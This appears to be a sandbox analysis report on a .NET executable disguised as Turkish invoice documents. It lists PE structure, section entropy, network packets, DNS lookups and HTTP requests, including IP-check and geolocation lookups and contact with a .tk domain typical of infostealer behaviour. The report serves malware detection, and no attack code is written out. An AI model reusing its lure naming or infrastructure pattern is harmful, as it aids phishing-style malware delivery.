add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa45c4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x48a84	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9ed48	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa263c	0xa2800	f10df08119eeb69be1d5a84b1ea0c151	False	0.8362935697115385	data	7.6979520777268835	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x48a84	0x48c00	3264a6a0f1097768cb12342a53acacff	False	0.06317788874570447	data	4.771659611060038	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0xc	0x200	05fed8daec121fb3f1a80aec4e036e81	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa62e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	0.1798780487804878
RT_ICON	0xa6948	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	0.2513440860215054
RT_ICON	0xa6c30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	0.3918918918918919
RT_ICON	0xa6d58	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3200959488272921
RT_ICON	0xa7c00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.33664259927797835
RT_ICON	0xa84a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.2622832369942196
RT_ICON	0xa8a10	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.04393141403083114
RT_ICON	0xeaa38	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.18786307053941909
RT_ICON	0xecfe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.2453095684803002
RT_ICON	0xee088	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3484042553191489
RT_GROUP_ICON	0xee4f0	0x92	data	0.5753424657534246
RT_VERSION	0xee584	0x314	data	0.43274111675126903
RT_MANIFEST	0xee898	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 15:18:52.824040890 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:53.020729065 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:53.020817995 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:53.022008896 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:53.217535019 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:53.218297005 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:53.268501043 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:54.784085989 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:54.980263948 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:55.034167051 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:55.121166945 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.121200085 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:55.121277094 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.126477957 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.126487017 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:55.325874090 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:55.326009989 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.369564056 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.369587898 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:55.369955063 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:55.424762011 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.731515884 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:55.772124052 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.154220104 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.154325962 CEST	443	49709	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.154417038 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.161468029 CEST	49709	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.165414095 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.364867926 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:56.368074894 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.368108988 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.368196011 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.368547916 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.368557930 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.549792051 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.556077957 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.558733940 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.558753014 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.783248901 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.783370972 CEST	443	49710	172.67.177.134	192.168.2.5
May 3, 2024 15:18:56.783432961 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.784027100 CEST	49710	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:56.787969112 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.789395094 CEST	49711	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.983568907 CEST	80	49707	132.226.247.73	192.168.2.5
May 3, 2024 15:18:56.983635902 CEST	49707	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.985882998 CEST	80	49711	132.226.247.73	192.168.2.5
May 3, 2024 15:18:56.985965967 CEST	49711	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:56.986133099 CEST	49711	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:57.182585955 CEST	80	49711	132.226.247.73	192.168.2.5
May 3, 2024 15:18:57.182941914 CEST	80	49711	132.226.247.73	192.168.2.5
May 3, 2024 15:18:57.184326887 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.184362888 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.184425116 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.184721947 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.184735060 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.237252951 CEST	49711	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:57.371051073 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.372840881 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.372860909 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.600699902 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.600768089 CEST	443	49713	172.67.177.134	192.168.2.5
May 3, 2024 15:18:57.600821972 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.601516008 CEST	49713	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:57.610430002 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:57.807482004 CEST	80	49715	132.226.247.73	192.168.2.5
May 3, 2024 15:18:57.807554007 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:57.807873964 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:58.003483057 CEST	80	49715	132.226.247.73	192.168.2.5
May 3, 2024 15:18:58.004662991 CEST	80	49715	132.226.247.73	192.168.2.5
May 3, 2024 15:18:58.049793005 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:58.304385900 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:58.304436922 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:58.304907084 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:58.431296110 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:58.431340933 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:58.615693092 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:58.659656048 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.057284117 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.057326078 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:59.157861948 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:59.157948971 CEST	443	49716	172.67.177.134	192.168.2.5
May 3, 2024 15:18:59.158015013 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.172856092 CEST	49716	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.422713041 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:59.424128056 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:59.618302107 CEST	80	49715	132.226.247.73	192.168.2.5
May 3, 2024 15:18:59.618360043 CEST	49715	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:59.620634079 CEST	80	49717	132.226.247.73	192.168.2.5
May 3, 2024 15:18:59.620706081 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:59.622492075 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:18:59.818981886 CEST	80	49717	132.226.247.73	192.168.2.5
May 3, 2024 15:18:59.819750071 CEST	80	49717	132.226.247.73	192.168.2.5
May 3, 2024 15:18:59.820899963 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.820935965 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:18:59.821016073 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.821288109 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:18:59.821300983 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:18:59.862257004 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.010000944 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.012691021 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.012712955 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.242885113 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.243005991 CEST	443	49718	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.243053913 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.252505064 CEST	49718	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.343853951 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.351185083 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.540324926 CEST	80	49717	132.226.247.73	192.168.2.5
May 3, 2024 15:19:00.540442944 CEST	49717	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.547776937 CEST	80	49719	132.226.247.73	192.168.2.5
May 3, 2024 15:19:00.547909021 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.548125982 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.744774103 CEST	80	49719	132.226.247.73	192.168.2.5
May 3, 2024 15:19:00.745521069 CEST	80	49719	132.226.247.73	192.168.2.5
May 3, 2024 15:19:00.747028112 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.747064114 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.747133017 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.747425079 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.747437954 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.799783945 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:00.940258980 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:00.941989899 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:00.942008972 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.173923016 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.174242020 CEST	443	49720	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.174340010 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.174840927 CEST	49720	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.178426027 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.179537058 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.376758099 CEST	80	49721	132.226.247.73	192.168.2.5
May 3, 2024 15:19:01.376785040 CEST	80	49719	132.226.247.73	192.168.2.5
May 3, 2024 15:19:01.376940012 CEST	49719	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.377126932 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.377126932 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.572630882 CEST	80	49721	132.226.247.73	192.168.2.5
May 3, 2024 15:19:01.573478937 CEST	80	49721	132.226.247.73	192.168.2.5
May 3, 2024 15:19:01.574723959 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.574759007 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.574851990 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.575093031 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.575105906 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.627882004 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.757924080 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.759480953 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.759500027 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.987322092 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.987423897 CEST	443	49722	172.67.177.134	192.168.2.5
May 3, 2024 15:19:01.987478971 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.988044024 CEST	49722	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:01.991883993 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:01.993096113 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:02.187486887 CEST	80	49721	132.226.247.73	192.168.2.5
May 3, 2024 15:19:02.187581062 CEST	49721	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:02.188630104 CEST	80	49723	132.226.247.73	192.168.2.5
May 3, 2024 15:19:02.188709021 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:02.188992023 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:02.384521008 CEST	80	49723	132.226.247.73	192.168.2.5
May 3, 2024 15:19:02.385395050 CEST	80	49723	132.226.247.73	192.168.2.5
May 3, 2024 15:19:02.387181044 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:02.387214899 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.387309074 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:02.387600899 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:02.387609959 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.440399885 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:02.574199915 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.576715946 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:02.576740026 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.808295965 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.808423042 CEST	443	49724	172.67.177.134	192.168.2.5
May 3, 2024 15:19:02.808501959 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:02.929044008 CEST	49724	443	192.168.2.5	172.67.177.134
May 3, 2024 15:19:03.972734928 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:04.114312887 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.114342928 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:04.114412069 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.114833117 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.114845991 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:04.168575048 CEST	80	49723	132.226.247.73	192.168.2.5
May 3, 2024 15:19:04.168673992 CEST	49723	80	192.168.2.5	132.226.247.73
May 3, 2024 15:19:04.307707071 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:04.307862997 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.318070889 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.318085909 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:04.318332911 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:04.319962025 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:04.360120058 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:43.518887043 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:43.518965006 CEST	443	49725	104.21.27.85	192.168.2.5
May 3, 2024 15:19:43.519365072 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:19:43.523286104 CEST	49725	443	192.168.2.5	104.21.27.85
May 3, 2024 15:20:02.195890903 CEST	80	49711	132.226.247.73	192.168.2.5
May 3, 2024 15:20:02.195944071 CEST	49711	80	192.168.2.5	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 15:18:52.727739096 CEST	60174	53	192.168.2.5	1.1.1.1
May 3, 2024 15:18:52.816323996 CEST	53	60174	1.1.1.1	192.168.2.5
May 3, 2024 15:18:55.020256996 CEST	55787	53	192.168.2.5	1.1.1.1
May 3, 2024 15:18:55.120155096 CEST	53	55787	1.1.1.1	192.168.2.5
May 3, 2024 15:19:03.972645998 CEST	52768	53	192.168.2.5	1.1.1.1
May 3, 2024 15:19:04.113651037 CEST	53	52768	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 3, 2024 15:18:52.727739096 CEST	192.168.2.5	1.1.1.1	0xf6e3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:55.020256996 CEST	192.168.2.5	1.1.1.1	0xaa6f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 3, 2024 15:19:03.972645998 CEST	192.168.2.5	1.1.1.1	0x4ca4	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:52.816323996 CEST	1.1.1.1	192.168.2.5	0xf6e3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:55.120155096 CEST	1.1.1.1	192.168.2.5	0xaa6f	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
May 3, 2024 15:18:55.120155096 CEST	1.1.1.1	192.168.2.5	0xaa6f	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
May 3, 2024 15:19:04.113651037 CEST	1.1.1.1	192.168.2.5	0x4ca4	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 3, 2024 15:19:04.113651037 CEST	1.1.1.1	192.168.2.5	0x4ca4	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:18:53.022008896 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 3, 2024 15:18:53.218297005 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8193ea51b7c4ff7f19eaa75ea9e90523 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>
May 3, 2024 15:18:54.784085989 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 3, 2024 15:18:54.980263948 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:54 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bb8de16fd2cd6c916ae13bf590137a1a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>
May 3, 2024 15:18:56.165414095 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 3, 2024 15:18:56.364867926 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 13:18:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 95fa250137e079c589abf7e8fa9277f5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	132.226.247.73	80	6368	C:\Users\user\Desktop\FATURA VE BELGELER..exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 15:18:56.986133099 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
